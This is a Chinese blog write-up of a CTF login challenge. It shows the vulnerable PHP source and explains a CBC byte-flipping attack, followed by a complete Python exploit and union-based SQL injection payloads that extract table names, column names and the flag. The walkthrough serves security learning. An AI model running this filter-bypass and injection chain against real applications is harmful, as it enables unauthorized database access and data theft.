实验吧 WEB 简单的登录题

最新推荐文章于 2024-06-30 09:46:49 发布
最新推荐文章于 2024-06-30 09:46:49 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 其他 文章标签: 实验吧 WEB 简单的登录题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1045553189/article/details/87388537
版权

知识点

CBC字节翻转攻击

0x01

查看消息头:
在这里插入图片描述得到源码:


define("SECRET_KEY", '***********');
define("METHOD", "aes-128-cbc");
error_reporting(0);
include('conn.php');
function sqliCheck($str){
	if(preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)){
		return 1;
	}
	return 0;
}
function get_random_iv(){
    $random_iv='';
    for($i=0;$i<16;$i++){
        $random_iv.=chr(rand(1,255));
    }
    return $random_iv;
}
function login($info){
	$iv = get_random_iv();
	$plain = serialize($info);
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}
function show_homepage(){
	global $link;
    if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
            $info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
            $sql="select * from users limit ".$info['id'].",0";
            $result=mysqli_query($link,$sql);

            if(mysqli_num_rows($result)>0  or die(mysqli_error($link))){
            	$rows=mysqli_fetch_array($result);
				echo '<h1><center>Hello!'.$rows['username'].'</center></h1>';
			}
			else{
				echo '<h1><center>Hello!</center></h1>';
			}
        }else{
            die("ERROR!");
        }
    }
}
if(isset($_POST['id'])){
    $id = (string)$_POST['id'];
    if(sqliCheck($id))
		die("<h1 style='color:red'><center>sql inject detected!</center></h1>");
    $info = array('id'=>$id);
    login($info);
    echo '<h1><center>Hello!</center></h1>';
}else{
    if(isset($_COOKIE["iv"])&&isset($_COOKIE['cipher'])){
        show_homepage();
    }else{
        echo '<body class="login-body" style="margin:0 auto">
                <div id="wrapper" style="margin:0 auto;width:800px;">
                    <form name="login-form" class="login-form" action="" method="post">
                        <div class="header">
                        <h1>Login Form</h1>
                        <span>input id to login</span>
                        </div>
                        <div class="content">
                        <input name="id" type="text" class="input id" value="id" onfocus="this.value=\'\'" />
                        </div>
                        <div class="footer">
                        <p><input type="submit" name="submit" value="Login" class="button" /></p>
                        </div>
                    </form>
                </div>
            </body>';
    }
}

define("METHOD", "aes-128-cbc"); 这一句提示加密方式是aes-128-cbc,为后面使用cbc字节翻转做铺垫。
读完源码后,可以大概知道做题流程如下:

  1. 输入参数id,对id进行过滤,返回base64转码后的iv和cipher;
  2. 设置cookie中的iv和cipher,重发请求报文,服务器使用iv和cipher以及SECRET_KEY解密得到plain,执行 $sql="select * from users limit ".$info['id'].",0";。(这里注意如果反序列化失败的话会输出反序列化之前的plain:$info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");)问题在于这条语句无论怎样执行都没有返回结果。
  3. 提交id的时候替换被吃掉的关键词,比如union的其中一个字母,得到cookie中的iv和cipher,进行cbc翻转攻击,得到新的密文;
  4. 使用旧的iv和新的cipher提交一次得到无法反序列化的plain,通过脚本得到新的iv;
  5. 提交新的iv和新的cipher,服务器将解密得到我们想要的plain,在执行SQL语句前并不会再次吃掉敏感关键词。

0x02

cbc字节翻转攻击参考:
CBC字符翻转 原理与实战
此攻击方法的精髓在于:通过损坏密文字节来改变明文字节。(注:借助CBC内部的模式)借由此可以绕过过滤器,或者改变用户权限提升至管理员,又或者改变应用程序预期明文以尽猥琐之事。

通过以下php脚本得到需要翻转的字符的位移:

<?php 
$payload = "0 2nion select * from ((select 1)a join (select group_concat(table_name) from infromation_schema.tables where table_schema regexp database())b join (select 3)c);"; 
$info=array('id'=>$payload); 
$plain = serialize($info); 
for($i=0;$i<strlen($plain);$i++) 
{ 
	echo $plain[$i]; 
	if(($i+1)%16==0) echo "<br />"; 
} 
?>

通过以下python脚本进行sql注入:

# -*- coding:utf8 -*-
import base64	
import requests
import re
import urllib
url ="http://ctf5.shiyanbar.com/web/jiandan/index.php"
payload ="0 2nion select * from ((select 1)a join (select value from you_want)b join (select 3)c);"+chr(0)
data = {'id':payload}
cookie = requests.post(url,data = data).headers['Set-Cookie']
iv = re.findall(r'iv=(.+),',cookie)[0]
cipher = base64.b64decode(urllib.unquote(re.findall(r'cipher=(.+)',cookie)[0]))
iv_row =list(base64.b64decode(urllib.unquote(iv)))
cipher_row =list(cipher)
offset =6
cipher_row[offset] =chr(ord(cipher_row[offset]) ^ord("2") ^ord("u"))
cipher_new = urllib.quote(base64.b64encode("".join(cipher_row)))
cookies = {"iv" : iv,"cipher" : cipher_new}
mistake = requests.get(url,cookies = cookies).content
wrong = base64.b64decode(re.findall(r'\(\'(.+)\'\)',mistake)[0])
iv_new =''
plaintext ="a:1:{s:2:\"id\";s:"
for x in range(16):
	iv_new = iv_new +chr(ord(iv_row[x]) ^ord(wrong[x]) ^ord(plaintext[x]))
iv_new = urllib.quote(base64.b64encode(iv_new))
cookies2 = {"iv" : iv_new,"cipher" : cipher_new}
result = requests.get(url,cookies = cookies2).content
print result

#得到数据库名
payload ="0 2nion select * from ((select 1)a join (select database())b join (select 3)c);"+chr(0)
#得到表名
payload ="0 2nion select * from ((select 1)a join (select group_concat(table_name separator '@') from information_schema.tables where table_schema regexp database())b join (select 3)c);"+chr(0)
#得到列名
payload ="0 2nion select * from ((select 1)a join (select group_concat(column_name separator '@') from information_schema.columns where table_name regexp 'you_want')b join (select 3)c);"+chr(0)
#得到flag
payload ="0 2nion select * from ((select 1)a join (select value from you_want)b join (select 3)c);"+chr(0)

参考

实验吧web-简单的登录题

dr0s3
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验吧——WEB-简单登录、后台登录、加了料的报错注入、你真的会PHP吗?
迷风小白
03-29 2827
一. 简单登录 这道确实一点都不简单 二、后台登录 这道打开就是一个登录框,输入一个1,提示密码错误,查看源代码。 <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $r...
CBC翻转攻击(实验吧_简单的登陆)
weixin_30550081的博客
04-13 118
目链接 http://ctf5.shiyanbar.com/web/jiandan/index.php 有源码在test.php页面 分析代码过程 如果post id,将id转字符串,然后进入sqliCheck函数, 如果函数返回true,就停了, 否则,将id转成array 然后到login函数 这里将$info序列化,然后aes加密,进行b...
CTF竞赛(不建议抄)
最新发布
2402_85002433的博客
06-30 450
1. 首先尝试输入一些常见的 SQL 注入攻击Payload,如'or 1=1 --'、'or 'a'='a' --'等,观察返回的结果,判断是否存在 SQL 注入漏洞。目描述:给出一个网络流量包(PCAP 文件),要求从中找出与特定任务相关的信息,例如找出某个特定的请求、还原传输的数据等。答案:根据对流量包的详细分析,提取出与任务相关的关键信息,如特定请求的参数、传输的数据内容或其他隐藏在流量中的线索。3. 在登录页面尝试输入不同的字符,观察服务器的响应,发现存在 SQL 注入漏洞的迹象。
CTF练习-Web1简单登录
weixin_43992606的博客
06-25 1438
CTF初入门小白,记录做过程。
面试登陆测试(web
qq_37603152的博客
03-10 1114
具体需求: 有一个登陆页面, 上面有2个textbox, 一个提交按钮。 请针对这个页面设计30个以上的testcase.   此的考察目的:面试者是否熟悉各种测试方法,是否有丰富的Web测试经验, 是否了解Web开发,以及设计Test case的能力   这个目还是相当有难度的, 一般的人很难把这个目回答好。 功能测试(Function test)   1.输入正确的用户名和密...
实验ctf-web:这个看起来有点简单
Elvira
08-22 7485
sql注入,sqlmap,union,information_schema
实验吧登陆一下好吗??WP
Yale的博客
03-19 9400
登陆一下好吗??(http://www.shiyanbar.com/ctf/1942) username= 1’=’0 password= 1’=’0 或者 username=what’=’ password=what’=’ 或者 username:admin’=’ password:admin’=’ 得到ctf{51d1bf8fb65a8c2406513ee8f522
web实验
lixuepeng_001的博客
09-18 913
实验内容: 一、实验目的: 掌握HTML语言标记 掌握HTML元素的的基本结构 学习使用文本编辑器创建HTML文档 理解文本编码的作用与意义 实验内容: 创建HTML文档 定义title 定义字符编码为UTF-8 定义关键词与描述 定义一个标 定义一个段落 在段落内定义使用上标定义显示X^2 定义一个外联的超链接 声明一个内部超链接锚点,并定义一个链接 定
实验一.基于web的用户登录界面
白山茶ι的博客
11-21 1660
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>登录</title> <style type="text/css"> *{ text-align:center; } .top1 { width:400px; height:200px; ma...
Web应用安全:XSS盗取cookiepayload(实验).docx
06-17
Cookie 并不是它的原意“甜饼”的意思,而是一个简单的文本文件,保存了客户机访问某个 Web 文档时的信息。 XSS 攻击 XSS 攻击是一种常见的 Web 应用攻击方式,指的是攻击者在网站上注入恶意脚本,使用户在访问...
实验ctf-web简单的sql注入
Elvira
08-25 1万+
简单的sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
实验WEB目WP
08-10
这是自己做的一个实验吧的十七到目的WP,其中也有别人的WP。
ctf 选择 库_实验CTF库-WEB(部分)
weixin_39613548的博客
12-19 1228
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
[网络安全自学篇] 四.实验CTF实战之WEB渗透和隐写术解密
热门推荐
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的目,涉及WEB渗透和隐写术常见型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
一道简单CTF登录
anquanniu的博客
03-06 8249
一、解感受 这道50分,在实验吧练习场算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成目。 所以本文主要是在pc...
实验吧_WEB解(一)
Galaxy_fan的博客
06-21 971
貌似有点难 打开发现就是php代码审计,其中重点就是 if ($GetIPs==”1.1.1.1”) 就显示flag 这就是伪造ip了,用burp 猫抓老鼠 打开之后让你输入key,随便 输入发现check failed! 再看目catch!catch!catch!应该就是要抓包的意思了 发现了一个base64自然就去解密了,得到1527259772,然后提交并不对...
实验简单的sql注入--三答案一样--_--
Gunther的博客
09-03 5303
简单的sql注入 关键字被过滤了 空格被过滤了 1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1 这样尝试爆出表名来,居然报错,好吧 我来两个空格(空格被过滤了),估计是有个过滤函数 1'
web二级综合应用登录界面)
赖格宝的博客
09-11 127
【代码】web二级综合应用登录界面)
蓝桥杯Web练习:实现用户登录功能
雨落宿命敲的博客
04-04 854
实现用户登录功能 背景介绍 数据动态化是前端开发中必备的基础技能,本次试将实现开发中最为常见的一个功能——用户登录。 准备步骤 在开始答前,你需要在线上环境终端中键入以下命令,下载并解压所提供的用户登录功能的基础代码: wget https://labfile.oss.aliyuncs.com/courses/4450/userlogin.zip && unzip userlogin.zip && mv userlogin/* ./ && rm -rf u
构建简单Web服务器:实验A.3套接字编程指南
"附录4-A类实验第3指导书1——简单Web服务器端实现" 在本次实验中,我们将深入探讨TCP连接的套接字编程和HTTP协议的基础知识,目标是构建一个简单Web服务器,能够处理单一的HTTP连接请求。这个实验主要涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值